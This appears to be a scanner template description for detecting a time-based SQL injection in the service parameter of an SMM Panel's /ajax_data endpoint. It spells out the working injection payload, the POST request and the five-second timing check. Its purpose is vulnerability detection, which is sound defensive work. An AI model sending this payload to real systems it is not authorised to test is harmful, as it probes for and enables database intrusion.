
Time-based SQL Injection Detection for SMM Panel
This template detects a time-based SQL Injection vulnerability in the service_detail parameter of the SMM Panel via HTTP POST requests to /ajax_data. Exploitation can allow remote attackers to access sensitive data or escalate privileges.
The tool sends a crafted POST request:
POST /ajax_data
Content-Type: application/x-www-form-urlencoded
action=service_detail&service=1624'XOR(if(now()=sysdate(),SLEEP(5),0))XOR'Z
If the response time is greater than 5 seconds, it indicates a vulnerable endpoint.
- Method: POST
- Path: {{BaseURL}}/ajax_data
- Headers: Content-Type: application/x-www-form-urlencoded
- Body: action=service_detail&service=1624'XOR(if(now()=sysdate(),SLEEP(5),0))XOR'Z
- Matcher: duration > 5 seconds
